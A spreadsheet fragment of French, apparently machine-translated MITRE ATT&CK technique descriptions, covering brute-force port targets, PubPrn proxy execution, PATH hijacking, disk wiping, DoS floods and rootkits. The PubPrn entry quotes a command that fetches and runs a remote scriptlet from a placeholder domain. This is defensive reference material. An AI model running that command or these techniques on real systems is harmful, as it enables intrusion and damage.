Les adversaires peuvent abuser de ces exclusions pour masquer leurs artefacts basés sur des fichiers. Par exemple, plutôt que de modifier les paramètres de l’outil pour ajouter une nouvelle exclusion (par exemple, [Désactiver ou modifier les outils](https://attack.mitre.org/techniques/T1562/001)), les adversaires peuvent supprimer leurs charges utiles basées sur des fichiers dans des exclusions par défaut ou autrement bien connues. Les adversaires peuvent également utiliser [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) et d’autres activités [Discovery](https://attack.mitre.org/tactics/TA0007)/[Reconnaissance](https://attack.mitre.org/tactics/TA0043) pour découvrir et vérifier les exclusions existantes dans un environnement victime.
https://attack.mitre.org/techniques/T1564/012</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier les autorisations/attributs de fichiers ou de répertoires pour contourner les listes de contrôle d’accès (ACL) et accéder aux fichiers protégés. (Citation : Hybrid Analysis Icacls1 juin 2018)(Citation : Analyse hybride Icacls2 mai 2018) Les autorisations de fichiers et de répertoires sont généralement gérées par des listes de contrôle d’accès configurées par le propriétaire du fichier ou du répertoire, ou par les utilisateurs disposant des autorisations appropriées. Les implémentations de listes de contrôle d’accès de fichiers et de répertoires varient selon la plate-forme, mais désignent généralement explicitement quels utilisateurs ou groupes peuvent effectuer quelles actions (lecture, écriture, exécution, etc.).
La plupart des plates-formes Linux et basées sur Linux fournissent un ensemble standard de groupes d’autorisations (utilisateur, groupe et autres) et un ensemble standard d’autorisations (lecture, écriture et exécution) qui sont appliqués à chaque groupe. Bien que les nuances de l’implémentation des autorisations de chaque plate-forme puissent varier, la plupart des plates-formes fournissent deux commandes principales utilisées pour manipuler les ACL de fichiers et de répertoires : &lt;code&gt;chown&lt;/code&gt; (abréviation de change owner) et &lt;code&gt;chmod&lt;/code&gt; (abréviation de change mode).
Adversarial peut utiliser ces commandes pour se faire propriétaire de fichiers et de répertoires ou changer de mode si les autorisations actuelles le permettent. Ils pourraient par la suite empêcher d’autres personnes d’accéder au fichier. Des modifications spécifiques de fichiers et de répertoires peuvent être une étape nécessaire pour de nombreuses techniques, telles que l’établissement de la persistance via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) ou l’altération/détournement d’autres fichiers binaires/de configuration instrumentaux via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). (Citation : 20 outils et techniques courants macOS)
https://attack.mitre.org/techniques/T1222/002</t>
  </si>
  <si>
    <t>Les adversaires qui n’ont aucune connaissance préalable des informations d’identification légitimes au sein du système ou de l’environnement peuvent deviner des mots de passe pour tenter d’accéder aux comptes. Sans connaître le mot de passe d’un compte, un adversaire peut choisir de deviner systématiquement le mot de passe à l’aide d’un mécanisme répétitif ou itératif. Un adversaire peut deviner les identifiants de connexion sans connaître au préalable les mots de passe du système ou de l’environnement au cours d’une opération à l’aide d’une liste de mots de passe courants. La supposition de mot de passe peut ou non prendre en compte les politiques de la cible en matière de complexité des mots de passe ou utiliser des stratégies qui peuvent verrouiller les comptes après un certain nombre de tentatives infructueuses.
Deviner les mots de passe peut être une option risquée, car elle peut entraîner de nombreux échecs d’authentification et de verrouillage de compte, en fonction des politiques d’échec de connexion de l’organisation. (Référence : Cylance Cleaver)
En règle générale, les services de gestion sur les ports couramment utilisés sont utilisés pour deviner les mots de passe. Les services les plus souvent ciblés sont les suivants :
* SSH (22/TCP)
* Telnet (23/TCP)
* FTP (21/TCP)
* NetBIOS / SMB / Samba (139/TCP et 445/TCP)
* LDAP (389/TCP)
* Kerberos (88/TCP)
* RDP / Terminal Services (3389/TCP)
* Services de gestion HTTP/HTTP (80/TCP et 443/TCP)
* MSSQL (1433/TCP)
* Oracle (1521/TCP)
* MySQL (3306/TCP)
* VNC (5900/TCP)
* SNMP (161/UDP et 162/TCP/UDP)
Outre les services de gestion, les adversaires peuvent « cibler l’authentification unique (SSO) et les applications basées sur le cloud à l’aide de protocoles d’authentification fédérés », ainsi que les applications de messagerie externes, telles qu’Office 365. (Référence : US-CERT TA18-068A 2018). De plus, les adversaires peuvent abuser des interfaces de périphériques réseau (telles que « wlanAPI ») pour forcer par force brute le(s) routeur(s) wifi(s) accessible(s) via des protocoles d’authentification sans fil. (Citation : Trend Micro Emotet 2020)
Dans les environnements par défaut, les tentatives de connexion LDAP et Kerberos sont moins susceptibles de déclencher des événements via SMB, ce qui crée l’événement d'« échec de connexion » Windows ID 4625.
https://attack.mitre.org/techniques/T1110/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser PubPrn pour l’exécution par proxy de fichiers distants malveillants. PubPrn.vbs est un script [Visual Basic](https://attack.mitre.org/techniques/T1059/005) qui publie une imprimante dans les services de domaine Active Directory. Le script peut être signé par Microsoft et est généralement exécuté via le [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via &lt;code&gt;Cscript.exe&lt;/code&gt;. Par exemple, le code suivant publie une imprimante dans le domaine spécifié : &lt;code&gt;cscript pubprn Printer1 LDAP ://CN=Container1,DC=Domain1,DC=Com&lt;/code&gt;. (Citation : pubprn)
Les adversaires peuvent abuser de PubPrn pour exécuter des charges utiles malveillantes hébergées sur des sites distants. (Citation : Enigma0x3 PubPrn Bypass) Pour ce faire, les adversaires peuvent définir le deuxième &lt;code&gt;paramètre script :&lt;/code&gt; pour référencer un fichier scriptlet (.sct) hébergé sur un site distant. Un exemple de commande est &lt;code&gt;pubprn.vbs 127.0.0.1 script :https ://mydomain.com/folder/file.sct&lt;/code&gt;. Ce comportement peut contourner les restrictions de validation de signature et les solutions de contrôle d’application qui ne tiennent pas compte de l’utilisation abusive de ce script.
Dans les versions ultérieures de Windows (10+), &lt;code&gt;PubPrn.vbs&lt;/code&gt; a été mis à jour pour empêcher l’exécution de proxy à partir d’un site distant. Cela se fait en limitant le protocole spécifié dans le deuxième paramètre à &lt;code&gt;LDAP://&lt;/code&gt;, au lieu du moniker &lt;code&gt;script :&lt;/code&gt; qui pourrait être utilisé pour référencer du code distant via HTTP(S).
https://attack.mitre.org/techniques/T1216/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent acheter des informations techniques sur les victimes qui peuvent être utilisées lors du ciblage. Les informations sur les victimes peuvent être disponibles à l’achat dans des sources et des bases de données privées réputées, telles que des abonnements payants à des flux de bases de données d’analyse ou à d’autres services d’agrégation de données. Les adversaires peuvent également acheter des informations auprès de sources moins fiables, telles que le dark web ou les marchés noirs de la cybercriminalité.
Les adversaires peuvent acheter des informations sur leurs cibles déjà identifiées ou utiliser des données achetées pour découvrir des opportunités de violations réussies. Les auteurs de menace peuvent recueillir divers détails techniques à partir des données achetées, y compris, mais sans s’y limiter, les coordonnées des employés, les informations d’identification ou des détails concernant l’infrastructure d’une victime. (Citation : Données de vente ZDNET) Les informations provenant de ces sources peuvent révéler des possibilités pour d’autres formes de reconnaissance (ex : [Phishing pour obtenir de l’information](https://attack.mitre.org/techniques/T1598) ou [Recherche de sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593)), d’établissement de ressources opérationnelles (ex : [Développer des capacités](https://attack.mitre.org/techniques/T1587) ou [Obtenir des capacités](https://attack.mitre.org/techniques/T1588)), et/ou d’accès initial (ex : [Externe à distance Services](https://attack.mitre.org/techniques/T1133) ou [Comptes valides](https://attack.mitre.org/techniques/T1078)).
https://attack.mitre.org/techniques/T1597/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de vider les informations d’identification pour obtenir des informations d’identification et de connexion au compte, généralement sous la forme d’un hachage ou d’un mot de passe en texte clair. Les informations d’identification peuvent être obtenues à partir des caches, de la mémoire ou des structures du système d’exploitation. (Citation : Brining MimiKatz à Unix) Les informations d’identification peuvent ensuite être utilisées pour effectuer [Mouvement latéral](https://attack.mitre.org/tactics/TA0008) et accéder à des informations restreintes.
Plusieurs des outils mentionnés dans les sous-techniques associées peuvent être utilisés à la fois par des adversaires et des testeurs de sécurité professionnels. D’autres outils personnalisés existent probablement aussi.
https://attack.mitre.org/techniques/T1003</t>
  </si>
  <si>
    <t>Les adversaires peuvent exécuter des charges utiles malveillantes en chargeant des modules partagés. Les modules partagés sont des fichiers exécutables qui sont chargés dans des processus pour fournir un accès à du code réutilisable, tel que des fonctions personnalisées spécifiques ou l’appel de fonctions API du système d’exploitation (c’est-à-dire, [API native](https://attack.mitre.org/techniques/T1106)).
Les adversaires peuvent utiliser cette fonctionnalité comme un moyen d’exécuter des charges utiles arbitraires sur un système victime. Par exemple, les adversaires peuvent modulariser les fonctionnalités de leurs logiciels malveillants en objets partagés qui exécutent diverses fonctions telles que la gestion des communications réseau C2 ou l’exécution d’actions spécifiques sur objectif.
Le chargeur de modules Linux et macOS peut charger et exécuter des objets partagés à partir de chemins locaux arbitraires. Cette fonctionnalité réside dans 'dlfcn.h' dans des fonctions telles que 'dlopen' et 'dlsym'. Bien que macOS puisse exécuter des fichiers « .so », la pratique courante utilise des fichiers « .dylib ». (Citation : Apple Dev Dynamic Libraries)(Citation : Bibliothèques partagées Linux)(Citation : RotaJakiro 2021 analyse netlab360)(Citation : Unit42 OceanLotus 2017)
Le chargeur de module Windows peut recevoir l’instruction de charger des DLL à partir de chemins locaux arbitraires et de chemins réseau UNC (Universal Naming Convention) arbitraires. Cette fonctionnalité réside dans 'NTDLL.dll' et fait partie de l'[API native](https://attack.mitre.org/techniques/T1106) de Windows qui est appelée à partir de fonctions telles que 'LoadLibrary' au moment de l’exécution. (Citation : Microsoft DLL)
https://attack.mitre.org/techniques/T1129</t>
  </si>
  <si>
    <t>Les adversaires peuvent collecter des données relatives aux appareils gérés à partir de référentiels de configuration. Les référentiels de configuration sont utilisés par les systèmes de gestion pour configurer, gérer et contrôler les données sur des systèmes distants. Les référentiels de configuration peuvent également faciliter l’accès à distance et l’administration des appareils.
Les adversaires peuvent cibler ces référentiels afin de collecter de grandes quantités de données sensibles d’administration système. Les données des référentiels de configuration peuvent être exposées par divers protocoles et logiciels et peuvent stocker une grande variété de données, dont une grande partie peut s’aligner sur les objectifs de découverte de l’adversaire. (Référence : US-CERT-TA18-106A)(Référence : US-CERT TA17-156A SNMP Abuse 2017)
https://attack.mitre.org/techniques/T1602</t>
  </si>
  <si>
    <t>Les adversaires peuvent corrompre ou effacer les structures de données du disque dur d’un disque dur nécessaire au démarrage d’un système ; Cibler des systèmes critiques spécifiques ou en grand nombre dans un réseau pour interrompre la disponibilité des ressources système et réseau. 
Les adversaires peuvent tenter de rendre le système incapable de démarrer en écrasant les données critiques situées dans des structures telles que l’enregistrement de démarrage principal (MBR) ou la table de partition. (Référence : Symantec Shamoon 2012)(Citation : FireEye Shamoon novembre 2016)(Citation : Palo Alto Shamoon, novembre 2016)(Citation : Kaspersky StoneDrill 2017)(Citation : Unité 42 Shamoon3 2018) Les données contenues dans les structures de disque peuvent inclure le code exécutable initial pour le chargement d’un système d’exploitation ou l’emplacement des partitions du système de fichiers sur le disque. Si ces informations ne sont pas présentes, l’ordinateur ne sera pas en mesure de charger un système d’exploitation pendant le processus de démarrage, laissant l’ordinateur indisponible. [Effacement de la structure du disque](https://attack.mitre.org/techniques/T1561/002) peut être effectué de manière isolée ou en même temps que [Effacement du contenu du disque](https://attack.mitre.org/techniques/T1561/001) si tous les secteurs d’un disque sont effacés.
Sur les périphériques réseau, les adversaires peuvent reformater le système de fichiers à l’aide des commandes [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) telles que 'format'. (Référence : format_cmd_cisco)
Pour maximiser l’impact sur l’organisation cible, les programmes malveillants conçus pour détruire les structures de disque peuvent avoir des fonctionnalités de type ver pour se propager sur un réseau en exploitant d’autres techniques telles que [Comptes valides](https://attack.mitre.org/techniques/T1078), [Vidage des informations d’identification du système d’exploitation](https://attack.mitre.org/techniques/T1003) et [Partages SMB/Windows Admin](https://attack.mitre.org/techniques/T1021/002). (Référence : Symantec Shamoon 2012)(Citation : FireEye Shamoon novembre 2016)(Citation : Palo Alto Shamoon, novembre 2016)(Citation : Kaspersky StoneDrill 2017)
https://attack.mitre.org/techniques/T1561/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de provoquer un déni de service (DoS) en envoyant directement un volume élevé de trafic réseau à une cible. Cette attaque DoS peut également réduire la disponibilité et la fonctionnalité du ou des systèmes et du réseau ciblés. [Inondation directe du réseau]Les (https://attack.mitre.org/techniques/T1498/001) sont lorsqu’un ou plusieurs systèmes sont utilisés pour envoyer un volume élevé de paquets réseau vers le réseau du service ciblé. Presque tous les protocoles réseau peuvent être utilisés pour l’inondation. Les protocoles sans état tels que UDP ou ICMP sont couramment utilisés, mais les protocoles avec état tels que TCP peuvent également être utilisés.
Les botnets sont couramment utilisés pour mener des attaques d’inondation de réseau contre les réseaux et les services. Les botnets de grande taille peuvent générer une quantité importante de trafic à partir de systèmes répartis sur l’Internet mondial. Les adversaires peuvent disposer des ressources nécessaires pour développer et contrôler leur propre infrastructure de botnet ou louer du temps sur un botnet existant pour mener une attaque. Dans certains des pires cas de DoS distribué (DDoS), tant de systèmes sont utilisés pour générer le flood que chacun n’a besoin d’envoyer qu’une petite quantité de trafic pour produire un volume suffisant pour saturer le réseau cible. Dans de telles circonstances, il devient extrêmement difficile de distinguer le trafic DDoS des clients légitimes. Les botnets ont été utilisés dans certaines des attaques DDoS flooding les plus médiatisées, telles que la série d’incidents de 2012 qui ont ciblé de grandes banques américaines. (Citation : USNYAG IranianBotnet mars 2016)
https://attack.mitre.org/techniques/T1498/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent exécuter leurs propres charges utiles malveillantes en détournant les variables d’environnement utilisées pour charger les bibliothèques. La variable d’environnement PATH contient une liste de répertoires (Utilisateur et Système) que le système d’exploitation parcourt séquentiellement à la recherche du binaire appelé à partir d’un script ou de la ligne de commande. 
Les adversaires peuvent placer un programme malveillant dans une entrée antérieure de la liste des répertoires stockés dans la variable d’environnement PATH, ce qui fait que le système d’exploitation exécute le binaire malveillant plutôt que le binaire légitime lorsqu’il effectue une recherche séquentielle dans cette liste PATH.
Par exemple, sous Windows, si un adversaire place un programme malveillant nommé « net.exe » dans 'C :\example path', qui précède par défaut 'C :\Windows\system32\net.exe' dans la variable d’environnement PATH, lorsque « net » est exécuté à partir de la ligne de commande, 'C :\example path' sera appelé à la place de l’exécutable légitime du système à 'C :\Windows\system32\net.exe. Certaines méthodes d’exécution d’un programme s’appuient sur la variable d’environnement PATH pour déterminer les emplacements recherchés lorsque le chemin d’accès du programme n’est pas indiqué, comme l’exécution de programmes à partir d’un [interpréteur de commandes et de scripts](https://attack.mitre.org/techniques/T1059). (Citation : ExpressVPN PATH env Windows 2021)
Les adversaires peuvent également modifier directement la variable $PATH en spécifiant les répertoires à rechercher.  Un adversaire peut modifier la variable '$PATH' pour qu’elle pointe vers un répertoire auquel il a un accès en écriture. Lorsqu’un programme utilisant la variable $PATH est appelé, le système d’exploitation recherche le répertoire spécifié et exécute le binaire malveillant. Sur macOS, cela peut également être effectué en modifiant la variable $HOME. Ces variables peuvent être modifiées à l’aide de la ligne de commande, de launchctl, de [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), ou en modifiant le contenu du dossier '/etc/paths.d'. (Citation : uptycs Fake POC linux malware 2023)(Citation : Variables PATH macOS nixCraft)(Citation : Elastic Rules macOS launchctl 2022)
https://attack.mitre.org/techniques/T1574/007</t>
  </si>
  <si>
    <t>Les adversaires peuvent exploiter le référentiel SharePoint comme source pour extraire des informations précieuses. SharePoint contient souvent des informations utiles pour qu’un adversaire puisse en savoir plus sur la structure et les fonctionnalités du réseau et des systèmes internes. Par exemple, voici une liste d’exemples d’informations qui peuvent avoir une valeur potentielle pour un adversaire et qui peuvent également être trouvées sur SharePoint :
* Politiques, procédures et normes
* Diagrammes de réseau physiques / logiques
* Diagrammes d’architecture système
* Documentation technique du système
* Références de test/développement (c’est-à-dire, [Informations d’identification non sécurisées](https://attack.mitre.org/techniques/T1552))
* Calendriers de travaux / projets
* Extraits de code source
* Liens vers des partages de réseau et d’autres ressources internes
https://attack.mitre.org/techniques/T1213/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent accéder directement à un volume pour contourner les contrôles d’accès aux fichiers et la surveillance du système de fichiers. Windows permet aux programmes d’avoir un accès direct aux volumes logiques. Les programmes disposant d’un accès direct peuvent lire et écrire des fichiers directement à partir du lecteur en analysant les structures de données du système de fichiers. Cette technique peut contourner les contrôles d’accès aux fichiers Windows ainsi que les outils de surveillance du système de fichiers. (Citation : Hakobyan 2009)
Des utilitaires, tels que « NinjaCopy », existent pour effectuer ces actions dans PowerShell. (Citation : github powersploit ninjacopy) Les adversaires peuvent également utiliser des utilitaires intégrés ou tiers (tels que 'vssadmin', 'wbadmin' et [esentutl](https://attack.mitre.org/software/S0404)) pour créer des clichés instantanés ou des sauvegardes de données à partir de volumes système. (Citation : LOLBAS Esentutl)
https://attack.mitre.org/techniques/T1006</t>
  </si>
  <si>
    <t>Les adversaires peuvent avoir accès à des outils d’intelligence artificielle générative, tels que les grands modèles de langage (LLM), pour faciliter diverses techniques de ciblage. Ces outils peuvent être utilisés pour informer, renforcer et permettre diverses tâches malveillantes, notamment la réalisation de [Reconnaissance](https://attack.mitre.org/tactics/TA0043), la création de scripts de base, l’assistance à l’ingénierie sociale et même le développement de charges utiles. (Référence : MSFT-AI)
Par exemple, en utilisant un LLM accessible au public, un adversaire externalise ou automatise essentiellement certaines tâches à l’outil. À l’aide de l’IA, l’adversaire peut rédiger et générer du contenu dans diverses langues écrites à utiliser dans les campagnes [d’hameçonnage](https://attack.mitre.org/techniques/T1566)/[d’hameçonnage à titre d’information](https://attack.mitre.org/techniques/T1598). Le même outil accessible au public peut permettre d’autres recherches sur les vulnérabilités ou d’autres recherches offensives soutenant [Développer des capacités](https://attack.mitre.org/techniques/T1587). Les outils d’IA peuvent également automatiser des tâches techniques en générant, affinant ou améliorant de toute autre manière (par exemple, [Fichiers ou informations obfusqués](https://attack.mitre.org/techniques/T1027)) des scripts et des charges utiles malveillants. (Citation : OpenAI-CTI)
https://attack.mitre.org/techniques/T1588/007</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de modifier les structures hiérarchiques dans les environnements d’infrastructure en tant que service (IaaS) afin d’échapper aux défenses.  
Les environnements IaaS regroupent souvent les ressources dans une hiérarchie, ce qui permet d’améliorer la gestion des ressources et l’application des politiques aux groupes concernés. Les structures hiérarchiques diffèrent d’un fournisseur de cloud à l’autre. Par exemple, dans les environnements AWS, plusieurs comptes peuvent être regroupés sous une seule organisation, tandis que dans les environnements Azure, plusieurs abonnements peuvent être regroupés sous un seul groupe de gestion. (Référence : AWS Organizations)(Citation : Ressources Microsoft Azure)
Les adversaires peuvent ajouter, supprimer ou modifier des groupes de ressources au sein d’une hiérarchie IaaS. Par exemple, dans les environnements Azure, un adversaire qui a obtenu l’accès à un compte d’administrateur général peut créer des abonnements dans lesquels déployer des ressources. Ils peuvent également se livrer au détournement d’abonnement en transférant un abonnement à l’utilisation existant d’un locataire victime à un locataire contrôlé par l’adversaire. Cela permettra à l’adversaire d’utiliser les ressources de calcul de la victime sans générer de journaux sur le locataire victime. (Citation : Microsoft Peach Sandstorm 2023)(Citation : Détournement d’abonnement Microsoft 2022)
Dans les environnements AWS, les adversaires disposant des autorisations appropriées dans un compte donné peuvent appeler l’API « LeaveOrganization », ce qui entraîne la séparation du compte de l’organisation AWS à laquelle il était lié et supprime toutes les politiques de contrôle de service, les garde-fous ou les restrictions qui lui sont imposés par son ancienne organisation. Les adversaires peuvent également appeler l’API « CreateAccount » afin de créer un nouveau compte au sein d’une organisation AWS. Ce compte utilisera les mêmes méthodes de paiement que celles enregistrées sur le compte de paiement, mais ne sera peut-être pas soumis aux détections ou aux politiques de contrôle de service existantes. (Référence : AWS RE :Inforce Threat Detection 2024)
https://attack.mitre.org/techniques/T1666</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des règles de messagerie pour masquer les e-mails entrants dans la boîte aux lettres d’un utilisateur compromis. De nombreux clients de messagerie permettent aux utilisateurs de créer des règles de boîte de réception pour diverses fonctions de messagerie, notamment le déplacement des e-mails vers d’autres dossiers, le marquage des e-mails comme lus ou la suppression d’e-mails. Les règles peuvent être créées ou modifiées dans les clients de messagerie ou par le biais de fonctionnalités externes telles que les applets de commande &lt;code&gt;New-InboxRule&lt;/code&gt; ou &lt;code&gt;Set-InboxRule&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001) sur les systèmes Windows. (Citation : Règles de boîte de réception Microsoft)(Citation : Règles de messagerie MacOS)(Citation : Microsoft New-InboxRule)(Citation : Microsoft Set-InboxRule)
Les adversaires peuvent utiliser des règles de messagerie dans la boîte aux lettres d’un utilisateur compromis pour supprimer et/ou déplacer des e-mails vers des dossiers moins visibles. Les adversaires peuvent le faire pour masquer les alertes de sécurité, les communications C2 ou les réponses aux e-mails [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) envoyés à partir du compte compromis.
Tout utilisateur ou administrateur au sein de l’organisation (ou tout adversaire disposant d’informations d’identification valides) peut être en mesure de créer des règles pour déplacer ou supprimer automatiquement les e-mails. Ces règles peuvent être utilisées de manière abusive pour altérer ou retarder la détection si le contenu de l’e-mail avait été immédiatement vu par un utilisateur ou un défenseur. Les règles malveillantes filtrent généralement les e-mails en fonction de mots clés (tels que &lt;code&gt;logiciel malveillant&lt;/code&gt;, &lt;code&gt;suspect,&lt;/code&gt; &lt;code&gt;hameçonnage&lt;/code&gt; et &lt;code&gt;piratage&lt;/code&gt;) trouvés dans le corps des messages et les lignes d’objet. (Citation : Sécurité des applications cloud Microsoft)
Dans certains environnements, les administrateurs peuvent être en mesure d’activer des règles de messagerie qui s’appliquent à l’ensemble de l’organisation plutôt qu’aux boîtes de réception individuelles. Par exemple, Microsoft Exchange prend en charge les règles de transport qui évaluent tous les messages qu’une organisation reçoit par rapport aux conditions spécifiées par l’utilisateur, puis effectuent une action spécifiée par l’utilisateur sur les messages qui respectent ces conditions. (Citation : Règles de flux de messagerie Microsoft 2023) Les adversaires qui abusent de ces fonctionnalités peuvent être en mesure de modifier ou de supprimer automatiquement tous les e-mails liés à des sujets spécifiques (tels que les notifications d’incidents de sécurité internes).
https://attack.mitre.org/techniques/T1564/008</t>
  </si>
  <si>
    <t>Un adversaire peut dégrader des systèmes externes à une organisation dans le but de diffuser des messages, d’intimider ou d’induire en erreur une organisation ou des utilisateurs. [Défiguration externe](https://attack.mitre.org/techniques/T1491/002) peut finalement amener les utilisateurs à se méfier des systèmes et à remettre en question/discréditer l’intégrité du système. Les sites Web externes sont souvent victimes de la défiguration ; Souvent pris pour cible par des groupes d’adversaires et d’hacktivistes afin de faire passer un message politique ou de diffuser de la propagande. (Citation : Cybermenaces de FireEye pour les industries des médias)(Citation : Déclaration de Kevin Mandia devant la Commission du renseignement du Sénat américain)(Citation : Des pirates anonymes défigurent le site du gouvernement russe) [Défiguration externe](https://attack.mitre.org/techniques/T1491/002) peuvent être utilisés comme catalyseur pour déclencher des événements ou en réponse à des mesures prises par une organisation ou un gouvernement. De même, la défiguration d’un site Web peut également être utilisée comme configuration ou précurseur d’attaques futures telles que [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). (Citation : Trend Micro Deep Dive into Defigurement)
https://attack.mitre.org/techniques/T1491/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent chiffrer ou encoder des fichiers pour masquer des chaînes, des octets et d’autres motifs spécifiques afin d’entraver la détection. Le chiffrement et/ou l’encodage du contenu d’un fichier visent à dissimuler des artefacts malveillants dans un fichier utilisé dans une intrusion. De nombreuses autres techniques, telles que le [Software Packing](https://attack.mitre.org/techniques/T1027/002), la [Steganographie](https://attack.mitre.org/techniques/T1027/003) et les [Embedded Payloads](https://attack.mitre.org/techniques/T1027/009), partagent le même objectif général. Le chiffrement et/ou l’encodage des fichiers peuvent entraîner une défaillance de la détection des signatures statiques, mais ce contenu malveillant n’est révélé (c’est-à-dire [Débrouiller/Décoder des fichiers ou des informations](https://attack.mitre.org/techniques/T1140)) au moment de l’exécution/de l’utilisation.
Ce type d’obfuscation de fichiers peut être appliqué à de nombreux artefacts de fichiers présents sur les hôtes victimes, tels que les fichiers de journal/configuration de logiciels malveillants et les fichiers de charge utile. (Citation : Obscurcissement de fichier) Les fichiers peuvent être chiffrés à l’aide d’une clé codée en dur ou fournie par l’utilisateur, ainsi que masqués à l’aide de schémas d’encodage/compression standard tels que Base64.
L’intégralité du contenu d’un fichier peut être obscurcie, ou seulement des fonctions ou des valeurs spécifiques (telles que les adresses C2). Le chiffrement et l’encodage peuvent également être appliqués dans des couches redondantes pour une protection supplémentaire.
Par exemple, les adversaires peuvent abuser de documents Word protégés par mot de passe ou d’archives auto-extractibles (SFX) comme méthode de chiffrement/encodage d’un fichier tel qu’une charge utile [Phishing](https://attack.mitre.org/techniques/T1566). Ces fichiers fonctionnent généralement en attachant le contenu archivé prévu à un stub de décompresseur qui est exécuté lorsque le fichier est appelé (par exemple, [Exécution par l’utilisateur](https://attack.mitre.org/techniques/T1204)). (Citation : SFX - Fichier crypté/encodé) 
Les adversaires peuvent également abuser des schémas d’encodage spécifiques aux fichiers ainsi que des schémas de codage personnalisés. Par exemple, les en-têtes BOM (Byte Order Mark) dans les fichiers texte peuvent être utilisés de manière abusive pour manipuler et obscurcir le contenu du fichier jusqu’à l’exécution de [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).
https://attack.mitre.org/techniques/T1027/013</t>
  </si>
  <si>
    <t>Les adversaires peuvent collecter les adresses IP de la victime qui peuvent être utilisées lors du ciblage. Les adresses IP publiques peuvent être attribuées aux organisations par bloc ou par une plage d’adresses séquentielles. Les informations sur les adresses IP attribuées peuvent inclure divers détails, tels que les adresses IP utilisées. Les adresses IP peuvent également permettre à un adversaire d’obtenir d’autres détails sur une victime, tels que la taille de l’organisation, l’emplacement physique, le fournisseur d’accès à Internet et/ou l’endroit et la manière dont son infrastructure publique est hébergée.
Les adversaires peuvent collecter ces informations de différentes manières, par exemple par le biais d’une [analyse active](https://attack.mitre.org/techniques/T1595) ou d’un [hameçonnage pour obtenir des informations](https://attack.mitre.org/techniques/T1598). Les informations relatives aux adresses IP attribuées peuvent également être exposées à des adversaires via des ensembles de données en ligne ou d’autres ensembles de données accessibles (ex : [Rechercher dans des bases de données techniques ouvertes](https://attack.mitre.org/techniques/T1596)). (Citation : WHOIS)(Citation : benne à ordures DNS)(Citation : Circl DNS passif) La collecte de ces informations peut révéler des possibilités pour d’autres formes de reconnaissance (ex : [Analyse active](https://attack.mitre.org/techniques/T1595) ou [Recherche de sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593)), d’établissement de ressources opérationnelles (ex : [Acquisition d’infrastructure](https://attack.mitre.org/techniques/T1583) ou [Compromission d’infrastructure](https://attack.mitre.org/techniques/T1584)), et/ou d’accès initial (ex : [Externe distant Services](https://attack.mitre.org/techniques/T1133)).
https://attack.mitre.org/techniques/T1590/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent lancer une attaque par déni de service (DoS) ciblant le système d’exploitation (OS) d’un terminal. Le système d’exploitation d’un système est chargé de gérer les ressources limitées et d’éviter que l’ensemble du système ne soit submergé par des demandes excessives sur sa capacité. Ces attaques n’ont pas besoin d’épuiser les ressources réelles d’un système ; les attaques peuvent simplement épuiser les limites et les ressources disponibles qu’un système d’exploitation s’impose lui-même.
Il existe différentes façons d’y parvenir, notamment les attaques d’épuisement d’état TCP telles que les inondations SYN et les inondations ACK. (Citation : Arbor AnnualDoSreport janvier 2018) Avec les inondations SYN, des quantités excessives de paquets SYN sont envoyées, mais l’établissement de liaison TCP à 3 voies n’est jamais terminé. Étant donné que chaque système d’exploitation dispose d’un nombre maximal de connexions TCP simultanées qu’il autorise, cela peut rapidement épuiser la capacité du système à recevoir de nouvelles demandes de connexions TCP, empêchant ainsi l’accès à tout service TCP fourni par le serveur. (Citation : Cloudflare SynFlood)
Les inondations ACK exploitent la nature étatique du protocole TCP. Un flot de paquets ACK est envoyé à la cible. Cela oblige le système d’exploitation à rechercher dans sa table d’état une connexion TCP associée qui a déjà été établie. Étant donné que les paquets ACK concernent des connexions qui n’existent pas, le système d’exploitation devra effectuer une recherche dans l’intégralité de la table d’état pour confirmer qu’aucune correspondance n’existe. Lorsqu’il est nécessaire de le faire pour un grand nombre de paquets, les exigences de calcul peuvent entraîner la lenteur et/ou l’inactivité du serveur, en raison du travail qu’il doit effectuer pour éliminer les paquets ACK non autorisés. Cela réduit considérablement les ressources disponibles pour fournir le service ciblé. (Référence : Corero SYN-ACKflood)
https://attack.mitre.org/techniques/T1499/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des rootkits pour masquer la présence de programmes, de fichiers, de connexions réseau, de services, de pilotes et d’autres composants du système. Les rootkits sont des programmes qui cachent l’existence de logiciels malveillants en interceptant/connectant et en modifiant les appels API du système d’exploitation qui fournissent des informations système. (Citation : Rootkits Windows Symantec) 
Les rootkits ou les fonctionnalités d’activation des rootkits peuvent résider au niveau de l’utilisateur ou du noyau dans le système d’exploitation ou à un niveau inférieur, pour inclure un hyperviseur, un enregistrement de démarrage principal ou un [microprogramme système](https://attack.mitre.org/techniques/T1542/001). (citation : Wikipedia rootkit) Les rootkits ont été vus pour les systèmes Windows, Linux et Mac OS X. (Citation : CrowdStrike Linux Rootkit) (Citation : BlackHat Mac OSX Rootkit)
https://attack.mitre.org/techniques/T1014</t>
  </si>
  <si>
    <t>Les adversaires peuvent obtenir de la persistance et des privilèges élevés en exécutant du contenu malveillant déclenché par des profils PowerShell. Un profil PowerShell (&lt;code&gt;profile.ps1&lt;/code&gt;) est un script qui s’exécute au démarrage de [PowerShell](https://attack.mitre.org/techniques/T1059/001) et qui peut être utilisé comme script d’ouverture de session pour personnaliser les environnements utilisateur.
